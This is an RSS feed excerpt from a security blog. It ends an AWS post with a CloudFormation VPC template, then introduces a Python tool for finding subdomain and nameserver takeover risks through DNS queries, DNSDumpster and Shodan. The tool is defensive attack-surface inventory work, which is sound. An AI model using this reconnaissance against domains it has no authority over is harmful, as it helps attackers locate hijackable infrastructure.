We could easily add log analysis tools at this phase.</li></ul><h2 id="setting-up-an-application-and-security-account">Setting up an application and security account</h2><p>I have attempted to keep everything we build to minimal cost, expecting it to be built in a free-tier personal account. Some of the stacks do carry charges (usually less than $1/hour for any examples shown in this series), so be sure to delete stacks as soon as you are done testing to minimize costs.</p><p>To follow along, you&apos;ll need a free AWS account, with an IAM user capable of managing organizations and accounts (I don&apos;t recommend using the root user for anything more than creating an admin user).</p><p>We will be creating separate accounts for each function. If you created a new AWS account, you first have to change it to an organization - go to the drop-down under your admin user name, and select <code>My Organization</code>.</p><p>Go through the steps of creating an application account, and a security account. The root account (the one that was initially created) can now be reserved only for management of the sub-accounts. Because this master account has access to everything, it should be completely locked down (MFA on all logins, a severely restricted list of who has any access, regular audits of activity, and perhaps more).</p><p>Securing the master account is a little outside the scope of this series, because you may want to include non-AWS protective measures to protect against internal threat actors, as well as the normal external actors. This account is also generally used to manage all billing for an organization, and may require other special considerations.</p><p>For each sub-account, create an admin user with access keys who will be able to build infrastructure.</p><h2 id="building-the-vpc-s-within-each-account">Building the VPC&apos;s within each account</h2><p>We&apos;re finally ready to create the actual VPC&apos;s we&apos;ll be building in. 
I am basing the templates on <a href="https://docs.aws.amazon.com/codebuild/latest/userguide/cloudformation-vpc-template.html?ref=nullsweep.com">this sample VPC creation template</a> found in the AWS documentation with a few minor changes.</p><p>Both VPC&apos;s include an internet gateway and public subnets, to allow internal resources to reach out to the internet for things like patches, but no traffic is currently allowed from the internet to our VPC&apos;s. </p><p>In a production situation, you might use a <a href="https://docs.aws.amazon.com/vpc/latest/userguide/vpn-connections.html?ref=nullsweep.com">VPN gateway</a> or <a href="https://docs.aws.amazon.com/directconnect/latest/UserGuide/Welcome.html?ref=nullsweep.com">Direct Connect </a>when setting up ingress routes to avoid any internet traffic for internal applications and especially for our security account.</p><p>Here is a sample CloudFormation template for building out a basic VPC. You can find these templates, along with all the samples shown in this series, in my <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure?ref=nullsweep.com">GitHub</a>:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">AWSTemplateFormatVersion: &quot;2010-09-09&quot;
Description:  This template deploys an application VPC, with a pair of public and private subnets spread
  across two Availability Zones. It deploys an internet gateway, with a default
  route on the public subnets. It deploys a pair of NAT gateways (one in each AZ),
  and default routes for them in the private subnets.

Parameters:
  EnvironmentName:
    Description: An environment name that is prefixed to resource names
    Type: String
    Default: &quot;lab&quot;

  VPCName:
    Description: A friendly name to refer to this VPC
    Type: String
    Default: &quot;Application&quot;

  VpcCIDR:
    Description: IP range (CIDR notation) for the application VPC
    Type: String
    Default: 10.11.0.0/16

  PublicSubnet1CIDR:
    Description: Please enter the IP range (CIDR notation) for the public subnet in the first Availability Zone
    Type: String
    Default: 10.11.10.0/24

  PublicSubnet2CIDR:
    Description: Please enter the IP range (CIDR notation) for the public subnet in the second Availability Zone
    Type: String
    Default: 10.11.11.0/24

  PrivateSubnet1CIDR:
    Description: Please enter the IP range (CIDR notation) for the private subnet in the first Availability Zone
    Type: String
    Default: 10.11.20.0/24

  PrivateSubnet2CIDR:
    Description: Please enter the IP range (CIDR notation) for the private subnet in the second Availability Zone
    Type: String
    Default: 10.11.21.0/24


Resources:
  VPC:
    Type: AWS::EC2::VPC
    Properties:
      CidrBlock: !Ref VpcCIDR
      EnableDnsSupport: true
      EnableDnsHostnames: true
      InstanceTenancy: &quot;default&quot; # I recommend setting to dedicated for sensitive workloads.
      Tags:
        - Key: Name
          Value: !Ref VPCName
        - Key: Environment
          Value: !Ref EnvironmentName

  InternetGateway:
    Type: AWS::EC2::InternetGateway
    Properties:
      Tags:
        - Key: Name
          Value: !Sub &quot;${EnvironmentName}-${VPCName}-InternetGateway&quot;
        - Key: Environment
          Value: !Ref EnvironmentName

  InternetGatewayAttachment:
    Type: AWS::EC2::VPCGatewayAttachment
    Properties:
      InternetGatewayId: !Ref InternetGateway
      VpcId: !Ref VPC

  PublicSubnet1:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 0, !GetAZs &apos;&apos; ]
      CidrBlock: !Ref PublicSubnet1CIDR
      MapPublicIpOnLaunch: true
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Subnet (AZ1)

  PublicSubnet2:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 1, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PublicSubnet2CIDR
      MapPublicIpOnLaunch: true
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Subnet (AZ2)

  PrivateSubnet1:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 0, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PrivateSubnet1CIDR
      MapPublicIpOnLaunch: false
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Subnet (AZ1)

  PrivateSubnet2:
    Type: AWS::EC2::Subnet
    Properties:
      VpcId: !Ref VPC
      AvailabilityZone: !Select [ 1, !GetAZs  &apos;&apos; ]
      CidrBlock: !Ref PrivateSubnet2CIDR
      MapPublicIpOnLaunch: false
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Subnet (AZ2)

  NatGateway1EIP:
    Type: AWS::EC2::EIP
    DependsOn: InternetGatewayAttachment
    Properties:
      Domain: vpc

  NatGateway2EIP:
    Type: AWS::EC2::EIP
    DependsOn: InternetGatewayAttachment
    Properties:
      Domain: vpc

  NatGateway1:
    Type: AWS::EC2::NatGateway
    Properties:
      AllocationId: !GetAtt NatGateway1EIP.AllocationId
      SubnetId: !Ref PublicSubnet1

  NatGateway2:
    Type: AWS::EC2::NatGateway
    Properties:
      AllocationId: !GetAtt NatGateway2EIP.AllocationId
      SubnetId: !Ref PublicSubnet2

  PublicRouteTable:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Public Routes

  DefaultPublicRoute:
    Type: AWS::EC2::Route
    DependsOn: InternetGatewayAttachment
    Properties:
      RouteTableId: !Ref PublicRouteTable
      DestinationCidrBlock: 0.0.0.0/0
      GatewayId: !Ref InternetGateway

  PublicSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PublicRouteTable
      SubnetId: !Ref PublicSubnet1

  PublicSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PublicRouteTable
      SubnetId: !Ref PublicSubnet2


  PrivateRouteTable1:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Routes (AZ1)

  DefaultPrivateRoute1:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PrivateRouteTable1
      DestinationCidrBlock: 0.0.0.0/0
      NatGatewayId: !Ref NatGateway1

  PrivateSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PrivateRouteTable1
      SubnetId: !Ref PrivateSubnet1

  PrivateRouteTable2:
    Type: AWS::EC2::RouteTable
    Properties:
      VpcId: !Ref VPC
      Tags:
        - Key: Name
          Value: !Sub ${VPCName} Private Routes (AZ2)

  DefaultPrivateRoute2:
    Type: AWS::EC2::Route
    Properties:
      RouteTableId: !Ref PrivateRouteTable2
      DestinationCidrBlock: 0.0.0.0/0
      NatGatewayId: !Ref NatGateway2

  PrivateSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Properties:
      RouteTableId: !Ref PrivateRouteTable2
      SubnetId: !Ref PrivateSubnet2

  # Here is where we might setup ingress for SSH or a bastion host. For now, no ingress allowed 
  NoIngressSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupName: &quot;no-ingress-sg&quot;
      GroupDescription: &quot;Security group with no ingress rule&quot;
      VpcId: !Ref VPC
</code></pre>
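<p>The subnet parameter defaults above are chosen to nest inside the VPC CIDR. As a quick standalone sanity check (my own sketch using Python&apos;s ipaddress module, not part of the template), you can verify that every subnet range sits inside the VPC range before deploying:</p>

```python
import ipaddress

def subnets_within_vpc(vpc_cidr, subnet_cidrs):
    """Return True when every subnet CIDR nests inside the VPC CIDR."""
    vpc = ipaddress.ip_network(vpc_cidr)
    return all(ipaddress.ip_network(c).subnet_of(vpc) for c in subnet_cidrs)

# The template defaults: a /16 VPC with four /24 subnets inside it.
defaults_ok = subnets_within_vpc(
    "10.11.0.0/16",
    ["10.11.10.0/24", "10.11.11.0/24", "10.11.20.0/24", "10.11.21.0/24"],
)
```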
<!--kg-card-end: markdown--><p>We will build this twice: one VPC in our security account, and one in our app account. You will need the access keys created earlier for both accounts. I assume you have stored one set of security keys during <code>aws configure</code>.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ aws cloudformation create-stack --stack-name security-vpc --template-body file://security_vpc.yaml
$ export AWS_ACCESS_KEY_ID=AAAAAAAAAAAAAAA
$ export AWS_SECRET_ACCESS_KEY=BBBBBBBBBBBBBBBBBBBBBBB
$ aws cloudformation create-stack --stack-name application-vpc --template-body file://application_vpc.yml
</code></pre>
<!--kg-card-end: markdown--><p>You should now be able to view VPC information in the console.</p><h2 id="conclusions">Conclusions</h2><p>This seems like a good stopping point for this step. We have set up our initial account structure and admin users, and built a VPC in each account to host our information.</p><p>In the next section, we will set up SSH access to EC2 and automate control installation. From there, we will move into log centralization and automated controls.</p><p>What else have you used to secure your AWS environments? Amazon is constantly coming out with new tools, so there are at least a few that I haven&apos;t touched on (yet!)</p>]]></content:encoded></item><item><title><![CDATA[Subdomain_recon.py: A SubDomain Reconnaissance Tool]]></title><description><![CDATA[A tool to search for subdomain and nameserver takeover risks across an organization, written in Python.]]></description><link>https://nullsweep.com/subdomain-recon-a-subdomain-reconnaissance-tool/</link><guid isPermaLink="false">5dcebeddab3deb04f38742cf</guid><category><![CDATA[Pentesting]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[osint]]></category><category><![CDATA[appsec]]></category><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Sun, 17 Nov 2019 13:28:43 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1542410613-d073472c3135?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1542410613-d073472c3135?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Subdomain_recon.py: A SubDomain Reconnaissance Tool"><p>Recently I participated in a hackathon building tools to help the blue team inventory our external attack surface. 
We are a large business with many global locations, datacenters, and devices, built up over time and via acquisition, so there is a lot to search for, and our internal inventories don&apos;t always keep up.</p><p>I decided to search for subdomain takeover and nameserver takeover risks across our infrastructure, and automate a way to maintain it going forward.</p><p>To accomplish this, I wrote a script to do the following:</p><ul><li>Check for any unregistered nameservers in the domain chain to search for domain takeover attack opportunities.</li><li>Try to find all known subdomains of a given domain, using the excellent <a href="https://dnsdumpster.com/?ref=nullsweep.com">DNSDumpster</a>.</li><li>Screenshot each subdomain for a quick visual inspection.</li><li>Collect shodan data for each subdomain infrastructure item found.</li><li>Write everything to an HTML report.</li></ul><h2 id="the-subdomain_recon-py-tool">The subdomain_recon.py Tool</h2><p>I recreated this script for general use and put it on my <a href="https://github.com/Charlie-belmer/subdomain_recon?ref=nullsweep.com">github</a>.</p><p>Here is the script running against this website:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ python subdomain_recon.py nullsweep.com
Checking nullsweep.com for subdomains and takeover opportunities...
Searching for unregistered name servers...
Checking name server f.gtld-servers.net. for com....
Checking name server j.gtld-servers.net. for com....
Checking name server i.gtld-servers.net. for com....
Checking name server a.gtld-servers.net. for com....
Checking name server h.gtld-servers.net. for com....
Checking name server l.gtld-servers.net. for com....
Checking name server g.gtld-servers.net. for com....
Checking name server b.gtld-servers.net. for com....
Checking name server e.gtld-servers.net. for com....
Checking name server m.gtld-servers.net. for com....
Checking name server c.gtld-servers.net. for com....
Checking name server k.gtld-servers.net. for com....
Checking name server d.gtld-servers.net. for com....
Checking name server josh.ns.cloudflare.com. for nullsweep.com....
Checking name server lara.ns.cloudflare.com. for nullsweep.com....
Searching for subdomains...
[verbose] Retrieved token: 4FhdLcwZDOwnpCqOXp5gzgVDzuz6Bv47v03z5eGUmc3J0L3yhEgSNMCRzxuIxZbE
list index out of range
	Found 3 subdomains
Wrote report to nullsweep.com.html
</code></pre>
<!--kg-card-end: markdown--><p>And here is a screenshot of the report. Shodan got my open ports wrong, probably because I am using CloudFlare:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2019/11/nullsweep_domain_report.png" class="kg-image" alt="Subdomain_recon.py: A SubDomain Reconnaissance Tool" loading="lazy"><figcaption>subdomain_recon report against nullsweep</figcaption></figure><h2 id="nameserver-takeover">NameServer Takeover</h2><p>For an excellent dive into nameserver takeover risks, I recommend reading the hackerblog entry <a href="https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/?ref=nullsweep.com">Hijacking Broken Nameservers to Compromise Your Target</a>.</p><p>In this script, I iterate through each component of a domain name and list the nameservers for that component. For nullsweep.com, this breaks down into finding nameservers for the &quot;.com&quot; and &quot;nullsweep.com&quot; domains. Sites that have longer chains like mysite.hostingsite.region.com would have checks for &quot;.com&quot;, &quot;.region.com&quot;, &quot;hostingsite.region.com&quot; and &quot;mysite.hostingsite.region.com&quot;, each of which may use different name servers.</p><p>For each name server found, we check its registration status.</p><!--kg-card-begin: markdown--><pre><code class="language-python">import dns.message
import dns.name
import dns.query
import dns.rcode
import dns.rdatatype

# name_server holds the IP of the resolver to query; it (and
# can_register) are defined elsewhere in the script.
def list_ns(domain):
    &apos;&apos;&apos; Return a list of name servers for the given domain&apos;&apos;&apos;
    q = dns.message.make_query(domain, dns.rdatatype.NS)
    r = dns.query.udp(q, name_server)
    if r.rcode() == dns.rcode.NOERROR and len(r.answer) &gt; 0:
        return r.answer[0].items
    return []


def get_ns_registration_status(domain, depth=2):
    &apos;&apos;&apos; Check registration status of all name servers.
    Depth of 2 will check TLD&apos;s such as .com or .info,
    3 or higher skips TLD
    &apos;&apos;&apos;
    domain = dns.name.from_text(domain)
    done = False
    nameservers = {}
    while not done:
        s = domain.split(depth)

        done = s[0].to_unicode() == u&apos;@&apos;
        subdomain = s[1]

        nss = list_ns(subdomain)
        for ns in nss:
            print(f&quot;Checking name server {ns} for {subdomain}...&quot;)
            nameservers[ns.to_text()] = &quot;registered&quot;
            if can_register(ns):
                nameservers[ns.to_text()] = &quot;UNREGISTERED&quot;
        depth += 1
    return nameservers
</code></pre>
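<p>The depth-based split above can be illustrated in isolation. Here is a minimal standalone sketch (my own illustration, not code from the tool) that produces the chain of parent domains the loop walks through:</p>

```python
def domain_chain(domain):
    """Return every parent domain checked, shortest suffix first.

    Mirrors the depth-based split in get_ns_registration_status:
    each suffix may be served by a different set of name servers.
    """
    labels = domain.strip(".").split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1, -1, -1)]
```

For nullsweep.com this yields the two checks described above; for a deeper chain it yields one entry per suffix, from the TLD down to the full host name.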
<!--kg-card-end: markdown--><h1 id="find-all-subdomains">Find all Subdomains</h1><p>There are tons of great tools out there for doing DNS busting (brute-forcing DNS and attempting zone transfers), but I wanted to use a service. Out of all the subdomain search tools I sampled, <a href="https://dnsdumpster.com/?ref=nullsweep.com">DNSDumpster</a> had by far the best results, even if sometimes they were out of date. Even better, they have an (unofficial) Python package.</p><p>Finding all subdomains is as simple as querying the service:</p><!--kg-card-begin: markdown--><pre><code class="language-python"># DNSDumpsterAPI comes from the unofficial dnsdumpster package;
# domain_details is a helper defined elsewhere in the script.
def find_subdomains(domain):
    results = DNSDumpsterAPI({&apos;verbose&apos;: True}).search(domain)
    subdomains = [domain_details(domain)]
    if len(results) &gt; 0:
        subdomains.extend(results[&apos;dns_records&apos;][&apos;host&apos;])
    return subdomains
</code></pre>
<!--kg-card-end: markdown--><p>There are other good tools out there that check for subdomain takeover opportunities (when a subdomain points to a third-party service that is no longer owned by the domain owner, such as a released S3 bucket, or a closed GitHub account).</p><p>You can find a good list of services that may allow takeover on <a href="https://github.com/EdOverflow/can-i-take-over-xyz?ref=nullsweep.com#all-entries">GitHub</a>, and a tool called <a href="https://github.com/haccer/subjack?ref=nullsweep.com">subjack</a>, which has some overlap with the one I wrote. Seeing a screenshot of any of those services likely means a takeover could be possible.</p><h2 id="integrating-shodan">Integrating Shodan</h2><p>Finally, I wanted to see what, if anything, Shodan had picked up about the services found. Shodan charges for larger result sets, but by querying a specific IP address, we can leverage the API with a free account just fine.</p><!--kg-card-begin: markdown--><pre><code class="language-python">import shodan

# api is a shodan.Shodan instance created from the user-supplied key
# elsewhere in the script, or None when no key was provided.
def shodan_data(ip):
    if api is None:
        return (&quot;&quot;, False)
    try:
        host = api.host(ip)
        return (host, True)
    except shodan.APIError as e:
        return (str(e), False)
</code></pre>
<!--kg-card-end: markdown--><p>In the above function, I handle the case where the user has not passed in an API key, in which case Shodan report data will be blank, and the case where Shodan errors. The most common cause of this was Shodan having no information about the provided IP address.</p><h2 id="final-thoughts">Final Thoughts</h2><p>The script turned out to be quite useful! It yields a fair amount of data that is quick to visually process and follow up on. </p><p>I would love to hear from the community on other techniques or tools I missed!</p>]]></content:encoded></item></channel></rss>